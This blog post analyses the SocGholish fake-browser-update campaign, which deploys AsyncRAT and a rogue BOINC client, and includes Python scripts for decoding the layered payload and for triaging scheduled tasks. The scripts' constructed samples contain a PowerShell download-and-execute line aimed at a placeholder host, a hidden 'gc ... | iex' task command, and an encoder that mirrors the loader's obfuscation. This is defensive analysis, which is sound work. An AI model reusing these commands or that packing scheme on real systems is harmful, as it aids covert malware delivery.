Thursday, October 3, 2024

Beware of Fake Browser Updates That Install Malicious BOINC Infrastructure

SocGholish malware, also known as FakeUpdates, has shown new behavior since July 4, 2024. The infection chain still begins with a compromised website that prompts the visitor to install a fake browser update.

Running the downloaded "update" executes malicious code that fetches additional malware. In earlier campaigns SocGholish typically installed common RATs; the recent intrusions instead executed additional files and scripts that deviate from that pattern.

Infection Chain

The initial malicious JavaScript downloads a PowerShell script that bypasses AMSI and fetches the next-stage loader from a domain produced by a domain generation algorithm (DGA).


This second stage decodes, decrypts, and decompresses a third-stage PowerShell script: the payload is stored as a Base64-encoded string, XORed with a hardcoded key, and Gzip-compressed. The same three steps can be replicated in CyberChef (From Base64, XOR with the key, Gunzip) to reveal the next AsyncRAT stage in clear text.

CyberChef recipe to decode the obfuscated AsyncRAT PowerShell commands.
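The three layers can also be unwrapped outside CyberChef. The Python below is an added example and is not code from the Huntress report or from the loader itself: it builds a blob in the layout the second stage consumes (gzip, XOR with a repeating key, Base64) from a constructed stand-in script and an assumed key, then reverses the layers, checks the gzip magic bytes before decompressing so that a wrong key fails with a useful error, and shows how the fixed gzip header leaks the first key bytes when the hardcoded key has not yet been extracted from the sample.

```python
import base64
import gzip

# Constructed stand-in for the third-stage script; the real payload is not reproduced here.
SAMPLE_STAGE3 = (
    "$u = 'http://example.invalid/next'; "
    "IEX (New-Object Net.WebClient).DownloadString($u)"
)
# Assumed hardcoded XOR key (the sample's actual key is not on this page).
SAMPLE_KEY = b"k3y-assumed"
GZIP_MAGIC = b"\x1f\x8b"


def xor_bytes(data: bytes, key: bytes) -> bytes:
    """XOR data against a repeating key. The operation is symmetric, so the
    same call both 'encrypts' for the loader and 'decrypts' for the analyst."""
    if not key:
        raise ValueError("empty XOR key")
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def pack_stage3(script: str, key: bytes) -> str:
    """Produce a blob in the layout the second stage consumes:
    gzip -> XOR -> Base64 (the reverse of the CyberChef recipe)."""
    compressed = gzip.compress(script.encode("utf-8"))
    return base64.b64encode(xor_bytes(compressed, key)).decode("ascii")


def unpack_stage3(blob: str, key: bytes) -> str:
    """Apply the recipe as an analyst would: From Base64 -> XOR -> Gunzip."""
    raw = base64.b64decode(blob)
    plain = xor_bytes(raw, key)
    # With the wrong key, XOR yields noise rather than a gzip member; checking
    # the magic bytes gives an actionable error instead of a cryptic gzip one.
    if plain[:2] != GZIP_MAGIC:
        raise ValueError("XOR key does not produce a gzip stream; check the key")
    return gzip.decompress(plain).decode("utf-8")


def recover_key_prefix(blob: str, key_length: int) -> bytes:
    """Known-plaintext shortcut for when the hardcoded key is not yet extracted.
    Every gzip member begins with 1f 8b 08, and the flags byte is 00 for streams
    written without a filename or comment (which is what .NET's GZipStream emits),
    so XORing those bytes against the ciphertext exposes the first
    min(4, key_length) key bytes."""
    raw = base64.b64decode(blob)
    known_header = b"\x1f\x8b\x08\x00"
    n = min(key_length, len(known_header), len(raw))
    return bytes(raw[i] ^ known_header[i] for i in range(n))


if __name__ == "__main__":
    blob = pack_stage3(SAMPLE_STAGE3, SAMPLE_KEY)
    print("blob:", blob[:48] + "...")
    print("key prefix:", recover_key_prefix(blob, len(SAMPLE_KEY)))
    print("stage 3:", unpack_stage3(blob, SAMPLE_KEY))
```

When the key is longer than four bytes, the header trick only yields its prefix; the remaining bytes have to come from the loader's own string constants, which is where a hardcoded key normally sits.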

Stage 3 uses several checks to detect virtualized environments: it looks for strings such as "VMware" or "VirtualBox" in system information and assigns a score for each hit.

A higher total score indicates a higher likelihood that the script is running in a virtual machine. The final score is sent as a parameter of a cURL request to another domain produced by the DGA.

If the score satisfies the threshold enforced on the C2 server (presumably meaning the host does not look like an analysis sandbox), the final AsyncRAT payload is delivered.

The domain used by the final AsyncRAT payload.

A separate malicious PowerShell script, disguised as a BOINC software installation, uses cURL to download a ZIP archive into a directory with a randomly generated name, extracts it, renames the contained executable (likely the BOINC client, BOINC.exe) to an equally random file name, and creates a scheduled task to execute it.

To reduce its footprint, the script then deletes itself and writes a registry value under a misspelled key name ("ExpirienceHost"), which likely serves as an infection marker.

Strings from the process memory of PowerShell show the scheduled task creation.

SocGholish is abusing BOINC, the open-source volunteer-computing platform, as command-and-control (C2) infrastructure: the disguised BOINC client is configured to attach to an attacker-controlled project server instead of the legitimate BOINC projects.

No malicious tasks have been observed on the rogue server yet, but because a BOINC project server can push work units and the executables that process them to attached clients, the attacker could use it to steal information, transfer files, or execute further malware on the infected hosts.

Malicious server project status page.

The AsyncRAT infection was discovered through analysis of scheduled tasks: the tasks carried malicious PowerShell commands hidden behind what looked like log file names, executed through a headless conhost.exe process.

These tasks establish persistence for AsyncRAT and maintain its connection to the C2 server. Tasks associated with a BOINC client were found alongside them; the client may have been downloaded for cryptocurrency mining or for other purposes.

According to Huntress, the techniques used in this attack closely resemble those linked to the SocGholish malware family, particularly the use of fake browser updates for initial access and obfuscated PowerShell downloads for AsyncRAT deployment.
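Both the scheduled task created by the BOINC installer script and the tasks that revealed the AsyncRAT infection are visible in Task Scheduler XML, which `schtasks /query /tn <name> /xml` prints and which also sits as files under C:\Windows\System32\Tasks. The Python below is an added triage script, not Huntress's tooling and not code from the report; the task documents, directory names and file names in it are constructed to resemble what the article describes (a headless conhost.exe launching PowerShell that runs a script disguised as a .log file, a renamed client executing from a random directory) and are not indicators from the campaign. It flags the headless-conhost pattern, the log-file disguise, -EncodedCommand arguments (which it decodes), and execution from user-writable directories.

```python
import base64
import re
import xml.etree.ElementTree as ET
from typing import List, Optional

TASK_NS = "{http://schemas.microsoft.com/windows/2004/02/mit/task}"
# Locations a legitimate scheduled task rarely executes from (heuristic).
USER_WRITABLE = ("\\appdata\\", "\\programdata\\", "\\temp\\", "\\users\\public\\")

# Constructed samples shaped like `schtasks /query /tn <name> /xml` output.
# Paths and file names are hypothetical, not indicators from the report.
SAMPLE_HEADLESS_TASK = r"""<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Actions Context="Author">
    <Exec>
      <Command>conhost.exe</Command>
      <Arguments>--headless powershell.exe -ep bypass -w hidden -c "gc C:\Users\Public\upd_2024-07.log | iex"</Arguments>
    </Exec>
  </Actions>
</Task>"""

SAMPLE_RENAMED_CLIENT_TASK = r"""<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Actions Context="Author">
    <Exec>
      <Command>C:\ProgramData\rk4z9q\updsvc.exe</Command>
    </Exec>
  </Actions>
</Task>"""

SAMPLE_BENIGN_TASK = r"""<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Actions Context="Author">
    <Exec>
      <Command>%windir%\System32\sc.exe</Command>
      <Arguments>start wuauserv</Arguments>
    </Exec>
  </Actions>
</Task>"""

# PowerShell's -EncodedCommand takes Base64 of the UTF-16LE script text.
_ENC = base64.b64encode("Start-Sleep 1".encode("utf-16-le")).decode("ascii")
SAMPLE_ENCODED_TASK = r"""<Task version="1.4" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Actions Context="Author">
    <Exec>
      <Command>powershell.exe</Command>
      <Arguments>-w hidden -enc %s</Arguments>
    </Exec>
  </Actions>
</Task>""" % _ENC


def decode_encoded_command(args: str) -> Optional[str]:
    """Recover the script behind the common spellings of -EncodedCommand."""
    m = re.search(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", args)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage_task(xml_text: str) -> List[str]:
    """Return findings for one Task Scheduler XML document (empty list = nothing odd)."""
    # Exported task files are UTF-16 with an XML declaration; once the text has
    # been decoded to str, drop the declaration so ElementTree accepts it.
    xml_text = re.sub(r"^\s*<\?xml[^>]*\?>", "", xml_text)
    root = ET.fromstring(xml_text)
    findings: List[str] = []
    for exec_el in root.iter(TASK_NS + "Exec"):
        cmd = (exec_el.findtext(TASK_NS + "Command") or "").strip()
        args = (exec_el.findtext(TASK_NS + "Arguments") or "").strip()
        cmd_l, args_l = cmd.lower(), args.lower()
        runs_ps = "powershell" in cmd_l or "powershell" in args_l or "pwsh" in args_l
        if cmd_l.endswith("conhost.exe") and "--headless" in args_l and runs_ps:
            findings.append("headless conhost.exe used to launch PowerShell")
        if runs_ps and ".log" in args_l and re.search(
            r"\biex\b|invoke-expression|get-content|\bgc\b", args_l
        ):
            findings.append("PowerShell reads and executes a file named like a log")
        decoded = decode_encoded_command(args)
        if decoded is not None:
            findings.append("encoded command decodes to: " + decoded.strip())
        if any(d in cmd_l for d in USER_WRITABLE):
            findings.append("task executes a binary from a user-writable path: " + cmd)
    return findings


if __name__ == "__main__":
    for name, doc in [("headless", SAMPLE_HEADLESS_TASK), ("renamed", SAMPLE_RENAMED_CLIENT_TASK),
                      ("encoded", SAMPLE_ENCODED_TASK), ("benign", SAMPLE_BENIGN_TASK)]:
        print(name, "->", triage_task(doc) or "clean")
```

Run it over every task exported from a suspect host; a task whose `Exec` has no default namespace (some tooling strips it) would need `TASK_NS` set to an empty string. The registry marker the article mentions (the misspelled "ExpirienceHost" value) is a separate check against the registry and is not covered by this script.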

Raga Varshini
Varshini is a cyber security expert in threat analysis, vulnerability assessment, and research, passionate about staying ahead of emerging threats and technologies.
